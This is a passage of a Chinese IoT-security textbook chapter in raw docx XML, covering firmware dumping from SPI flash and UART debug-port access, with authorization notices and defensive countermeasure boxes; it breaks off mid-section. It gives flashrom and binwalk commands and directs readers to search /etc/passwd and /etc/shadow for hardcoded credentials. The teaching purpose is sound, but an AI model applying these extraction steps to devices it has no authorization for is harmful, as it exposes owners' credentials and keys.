        <w:t xml:space="preserve">21.1 IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与硬件安全:固件、UART</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与重放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节内容建立在《从位到物联》第19–23章（单片机结构、外设接口、通信总线）及第29–31章（IoT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议栈、MQTT、OTA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">更新）的硬件与协议底座之上，不再重讲寄存器映射、总线时序或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MQTT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文格式。本书第28章已点名重放攻击的基本概念，本节将其在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">物理设备场景中具体化。读者应已熟悉</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">及无线局域网基本安全模型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有操作仅限读者自有设备、已获书面授权的测试设备或官方授权的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机镜像。任何固件提取、UART</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接或无线信号捕获行为必须在与公网及生产环境物理隔离的实验网络中进行。未经授权对他人设备执行上述操作是违法行为，与本教材宗旨相悖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全的独特之处在于，攻击面从传统的网络服务一路延伸至物理硬件与本地通信。当防御者用防火墙和入侵检测系统将网络边界加固到一定程度时，攻击者会问：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">如果我能直接触碰设备，或者窃听它发往本地网关的第一段无线信号，那些网络层防护还剩下什么？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这就是本节要探讨的三个经典硬件与近场攻击路径——固件提取、UART</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调试口利用与重放攻击——它们共同揭示了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全中被违反的最底层假设：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">设备本身是不可被物理/逻辑非法访问的，本地通信是不可窃听与篡改的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从防御者视角看，理解这些攻击是部署安全启动、硬件信任根、禁用调试接口以及实现防重放协议的前提。本节严格遵循“攻击原理→实验验证→防御对照”的对称结构，所有实操均在授权环境中以通用开发板或开源固件为对象，不涉及真实型号的漏洞武器化。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="374"/>
    <w:bookmarkStart w:id="375" w:name="固件提取从设备到二进制"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">固件提取：从设备到二进制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。固件是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设备的灵魂，其中打包了操作系统、应用程序、凭据、加密密钥和默认配置。一旦攻击者获得固件副本，就可以进行静态分析，查找硬编码的后门账户、私钥、弱密码恢复逻辑、未加密的文件系统分区和已知漏洞的软件组件。获取方式分为两类：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">非侵入式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（通过官方固件更新包、OTA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">抓包、设备</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">维护接口的下载功能）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">侵入式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（物理拆解设备，从闪存芯片直接读取）。非侵入式方法往往最先行，因为其风险低；当固件加密或更新包受签名保护时，入侵式方法成为必然。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。嵌入式设备的固件通常存放于外部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SPI Flash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> eMMC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">存储器中，通过编程器（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CH341A、FT232H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOIC8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试夹）可以像读</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> U </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">盘一样将其内容全部倾印出来。这类存储器没有现代硬盘的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全锁定，也不会主动擦除自己，只要芯片未被通过熔丝物理写保护，攻击者就能读出每一位数据——这一操作不依赖于设备的处理器或操作系统是否正常运行，因而设备“好像关机了就是安全的”这一假设被彻底推翻。同理，厂商可能将固件更新包以明文形式放在官网支持页面；即使加密，如果解密密钥硬编码在上一版本固件中，亦可被提取后复用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">技术机理与武器化限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。以下流程为实验室通用方法论，不针对某款具体在售设备，且所有环境变量以占位符标注。①通用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">识别存储芯片：根据设备</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PCB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上的丝印找到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚封装的主存储</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IC，查阅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> datasheet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">确认其为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SPI NOR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Flash（常见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 25 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系列）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAND/eMMC。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接编程器：将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOIC8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试夹夹在芯片上（注意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚方向），另一端接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> USB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编程器。编程器与电脑连接后，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flashrom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Linux）或厂商工具读取芯片内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取与验证：执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flashrom -p ch341a_spi -r firmware_dump.bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（具体参数因芯片和编程器型号而异），建议连续读取两次并比对哈希，确保数据完整性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1215"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">固件分析：使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Binwalk（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">binwalk -Me firmware_dump.bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）提取嵌入的文件系统。手动检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">、配置目录、Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器根目录，查找硬编码凭据、私钥和调试端点。对于常见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">平台，文件系统可能是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SquashFS、JFFS2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UBIFS，Binwalk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的解包能力依赖其签名数据库，若无法成功，可使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按头部特征手动切分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">③此为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和授权分析的标准教学流程，并非直接面向在野设备的武器化利用。生产固件常具备加密或混淆，本文不教授破解方法，仅展示固件包未被保护的“理想情况”以阐明原理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">交差回指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：《从位到物联》第31章已介绍</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OTA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">更新的一般过程，固件提取恰恰利用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OTA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全机制缺位或存储保护不足的弱点。第23章讲述的外部总线（SPI）知识是物理读取闪存的基础。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框（固件提取）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">固件加密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：出厂固件和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OTA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包必须使用设备唯一密钥或平台密钥进行加密，密钥存储在安全元件（SE）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TrustZone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内，不可通过常规手段读出。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：处理器从不可篡改的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BootROM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开始，每一级固件加载前都进行签名验证（RSA/ECDSA）。此机制确保即使攻击者物理更换了闪存内容，设备也无法启动被篡改的固件。交叉回指《从位到物联》Ch31</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OTA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全讨论。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">调试接口熔断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> eMMC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等易被物理访问的存储器，可考虑在装配阶段烧断芯片的永久写保护引线（WP#），但这也会影响合法售后。更实际的做法是确保固件中不存放长期有效的明文密钥。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">静态分析无敏感信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：固件中不嵌入生产凭据、主密钥；所有密钥利用安全存储动态派生。OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明确将“固件中包含硬编码敏感信息”列为高危项。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="375"/>
    <w:bookmarkStart w:id="376" w:name="uart-调试口利用隐藏的超级入口"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UART </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调试口利用：隐藏的超级入口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。嵌入式系统开发阶段，工程师会在电路板上引出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UART </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">串行调试口，用于观察内核日志、与引导加载程序交互，甚至直接进入不需要密码的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell。当设备推向市场时，这些串口本应被移除或禁用，但成本压力与设计惯性使得它们常常仅仅是没有焊接排针而已，焊盘电平仍然活跃。攻击者只需要一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> USB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转串口模块（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CP2102、FT232）和逻辑分析仪，就能找到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TX/RX/GND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">引脚，成为“设备的物理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户”，这对于后续的固件提取、内存取证和持久化植入是灾难性的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。你可以把</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UART </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调试口想象成建房子时工人留的侧门——工程期间方便进出，本应在交房时用砖砌死。如果开发商偷懒，只是把门把手拧下来、贴了壁纸，那么新住户一推门就能进来。IoT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设备的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UART </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
